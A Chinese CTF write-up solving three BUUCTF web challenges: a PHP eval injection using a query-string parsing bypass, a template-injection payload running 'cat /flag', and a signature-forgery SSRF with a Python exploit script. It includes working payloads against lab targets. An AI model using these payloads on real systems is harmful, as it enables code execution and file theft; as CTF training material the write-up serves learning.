BUUCTF WEB
BUUCTF 几道WEB题WP
- 今天做了几道Web题,记录一下,Web萌新写的不好,望大佬们见谅○| ̄|_
[RoarCTF 2019]Easy Calc
知识点:PHP的字符串解析特性
- 参考了一下网上大佬文章
http://gality.cn/2019/10/21/php%E5%AD%97%E7%AC%A6%E4%B8%B2%E8%A7%A3%E6%9E%90%E7%89%B9%E6%80%A7%E7%A0%94%E7%A9%B6/
- 在php中,查询的字符串(URL或正文中)会被转换为内部
$_GET
或$_POST
数组. 例如:/?foo=bar
变成Array([foo] => “bar”
)。值得注意的是,查询字符串在解析的过程中会将某些字符删除或用下划线代替。例如,/?%20news[id%00=42会转换为Array([news_id] => 42)
。 - 对于
/news.php?%20news[id%00=42"+AND+1=0--
来说,PHP语句的参数%20news[id%00的值将存储到$_GET[“news_id”]
中。 - PHP需要将所有参数转换为有效的变量名,因此在解析查询字符串时,php需要完成两件事:
1、删除空白符
2、将某些字符转换为下划线(包括空格) - 我个人理解就是对于限制了只允许传入数值参数,对于非数值型数据产生禁止的waf,我们可以使用加空格来绕过
题目分析:
- 查看源码发现下列信息
<!--I've set up WAF to ensure security.-->
<script>
$('#calc').submit(function(){
$.ajax({
url:"calc.php?num="+encodeURIComponent($("#content").val()),
type:'GET',
success:function(data){
$("#result").html(`<div class="alert alert-success">
<strong>答案:</strong>${data}
</div>`);
},
error:function(){
alert("这啥?算不来!");
}
})
return false;
})
</script>
- 可以看到设置了有一个WAF,在script中又发现一个url字样,有calc.php,尝试访问发现WAF源码
<?php
error_reporting(0);
if(!isset($_GET['num'])){
show_source(__FILE__);
}else{
$str = $_GET['num'];
$blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]','\$','\\','\^'];
foreach ($blacklist as $blackitem) {
if (preg_match('/' . $blackitem . '/m', $str)) {
die("what are you want to do?");
}
}
eval('echo '.$str.';');
}
?>
- 发现有一个GET传参参数num,和一堆黑名单,在尝试在num传参时,发现以下情形
calc.php?num=1
calc.php?num=a
- 发现这里对非数值型数据有过滤拦截,这里就尝试php字符串解析的漏洞,使用加空格绕过,因为php解析的时候会自动将空格去除
正常返回:
- 那么我们就可以尝试去读取文件信息,首先遍历一下根目录文件,但是发现黑名单中有过滤,过滤了'/',尝试绕过,对其进行转成ascii码,发现可以执行
calc.php?%20num=a;var_dump(scandir(chr(47)))
- 注:这里可以多语句执行是因为
eval('echo '.$str.';');
这里语句eval每次将拼接后的语句闭合后执行了 - 最后拼接flag文件名读取即可
calc.php?%20num=a;var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))
[BJDCTF2020]The mystery of ip
知识点:SSTI
- Shana师傅的题(●'◡'●),尝试之后发现是SSTI
- 直接执行系统函数
{{system('ls /')}}
{{system('cat /flag')}}
[De1CTF 2019]SSRF Me
知识点:SSRF,字符串拼接
- 这题的另外两种wp其实说实话没弄懂,就是按照第二种方法复现了一下○| ̄|_
- 另外这题有三种解法,大家可以参考一下这个:
https://xz.aliyun.com/t/5927#toc-0
- 大致思路分析:进入网站,发现直接给出了后端源码,发现是用
python
的Flask
框架写的,这里主要是定义了三个路由,也是和这题相关的几个地方 - 其中访问
geneSign
时会返回一串md5
,看一下源码得知这个md5
是由三部分构成,secert_key + param + action
,而getSign
函数生成md5
时,只接收了两个参数action
和param
其中的action
主要就是readscan
的操作,而param
是我们直接get
传的参数,剩下要解决关键action
问题(这里就要利用字符串拼接的方式解决)而这个secert_key
是由os
生成的随机16位字符串 - 对于这里的
md5(secert_key + param + action)
在python
使用md5
处理的话相当于md5(secert_keyflag.txtscan)
,这样我们就可以尝试直接拼接后让他生成md5
,直接构造
/geneSign?param=flag.txtread
这样当到python
中处理的时候,会自动和scan
进行拼接,得到这样的运算md5(secert_keyflag.txtreadscan)
,这就发现居然解决了action
是
readscan
的问题了,同时也获得了md5
@app.route("/geneSign", methods=['GET', 'POST'])
def geneSign():
param = urllib.unquote(request.args.get("param", ""))
action = "scan"
return getSign(action, param) # 返回md5
def getSign(action, param):
return hashlib.md5(secert_key + param + action).hexdigest() #生成的md5摘要
- 接下来就只要直接访问
/De1ta?param=flag.txt
构造cookie:action=readscan;sign=67a14a623ade3f0c2b5a4d98b51708db
即可 - exp如下:
import requests
url = 'http://91a0d8ea-be8a-431a-9caf-33ed47fcce5f.node3.buuoj.cn/De1ta?param=flag.txt'
cookies = {
'sign': '67a14a623ade3f0c2b5a4d98b51708db',
'action': 'readscan',
}
res = requests.get(url=url, cookies=cookies)
print(res.text)
BUUCTF WEB的更多相关文章
- BuuCTF Web Writeup
WarmUp index.php <html lang="en"> <head> <meta charset="UTF-8"> ...
- 记一次phpmyadmin 4.8.1 远程文件包含漏洞(BUUCTF web)
题目很简单,一个滑稽 打开源码,发现存在source.php文件 于是访问文件,发现出现一串php源码 提示存在hint.php,于是访问发现一句话 flag not here, and flag i ...
- buuctf—web—高明的黑客
打开靶机,看到如下界面 于是打开www.tar.gz 下载后发现是一个放有大量php文件的文件夹 看了大佬的wp后明白了是fuzzing 附上大佬的脚本 import os import re imp ...
- buuctf—web—Easy Calc
启动靶机,查看网页源码,发现关键字 $("#content").val() 是什么意思: 获取id为content的HTML标签元素的值,是JQuery, ("# ...
- BUUCTF WEB-WP(3)
BUUCTF WEB 几道web做题的记录 [ACTF2020 新生赛]Exec 知识点:exec命令执行 这题最早是在一个叫中学生CTF平台上看到的类似,比这题稍微要复杂一些,多了一些限制(看看大佬 ...
- BUUCTF刷题记录(Web方面)
WarmUp 首先查看源码,发现有source.php,跟进看看,发现了一堆代码 这个原本是phpmyadmin任意文件包含漏洞,这里面只不过是换汤不换药. 有兴趣的可以看一下之前我做的分析,http ...
- [原题复现+审计][BUUCTF 2018]WEB Online Tool(escapeshellarg和escapeshellcmd使用不当导致rce)
简介 原题复现:https://github.com/glzjin/buuctf_2018_online_tool (环境php5.6.40) 考察知识点:escapeshellarg和escap ...
- buuctf刷题之旅—web—EasySQL
打开环境,发现依旧是sql注入 GitHub上有源码(https://github.com/team-su/SUCTF-2019/tree/master/Web/easy_sql) index.php ...
- buuctf刷题之旅—web—随便注
打开环境 根据提示应该是sql注入 查看数据库名,和数据表 1';show databases;# 1';show tables;# 查看表内字段(1';desc `1919810931114514` ...
随机推荐
- libevent(九)evhttp
用libevent构建一个http server非常方便,可参考libevent(六)http server. 主要涉及的一个结构体是evhttp: struct evhttp { /* Next v ...
- 036_python的大文件下载以及进度条展示
复习 1.黏包现象 粘包现象的成因: tcp协议的特点,面向流的,为了保证可靠传输,所以有很多优化的机制. 无边界 所有在连接建立的基础上传递的数据之间没有界限. 收发消息很有可能不完全相等. 缓存机 ...
- 近期总结的一些Java基础
1.面向过程:当需要实现一个功能的时候,每一个过程中的详细步骤和细节都要亲力亲为. 2.面向对象:当需要实现一个功能的时候,不关心详细的步骤细节,而是找人帮我做事. 3.类和对象的关系: a-类是 ...
- 谈谈Spring中的BeanPostProcessor接口
一.前言 这几天正在复习Spring的相关内容,在了解bean的生命周期的时候,发现其中涉及到一个特殊的接口--BeanPostProcessor接口.由于网上没有找到比较好的博客,所有最后花了好 ...
- spring data jpa 多对多 ManyToMany
环境搭建 源码地址:gitee:https://gitee.com/ytfs-dtx/JPA 导入依赖 <properties> <spring.version>5.2.5.R ...
- GNU ARM 汇编基础
ARM GNU汇编基础 0 前言 全文补充提醒: 笔者在阅读ARM官方文档及查阅实际的u-boot源码中的汇编代码后,发现了一些不同于ARM官方文档中的汇编语法,查阅相关资料后,才发现主要由于汇编器的 ...
- linux 修改时间同步到BIOS
设置时间和日期例如:将系统日期设定成2020年4月14日的命令 命令 : "date -s 04/14/2020" 将系统时间设定成下午5点55分55秒的命令 命令 : " ...
- Lottery
0x01 修改金币到8位,才能买东西 robots.txt中发现.git泄露 下载附件,得到源码 审计api.php 我们传入的值与随机生成的值进行比较, 按照相同的个数,得到不同的钱 if($num ...
- 2018-07-01 jq效果
jq效果的实现方法: 1.基本 show(time) -> 显示:相当于display:block hide(time) -> 隐藏:相当于display:none toggle(time ...
- js中的小案例(一)
效果图: html代码: <div id="date"> <p> <span id="prev">上一月</span& ...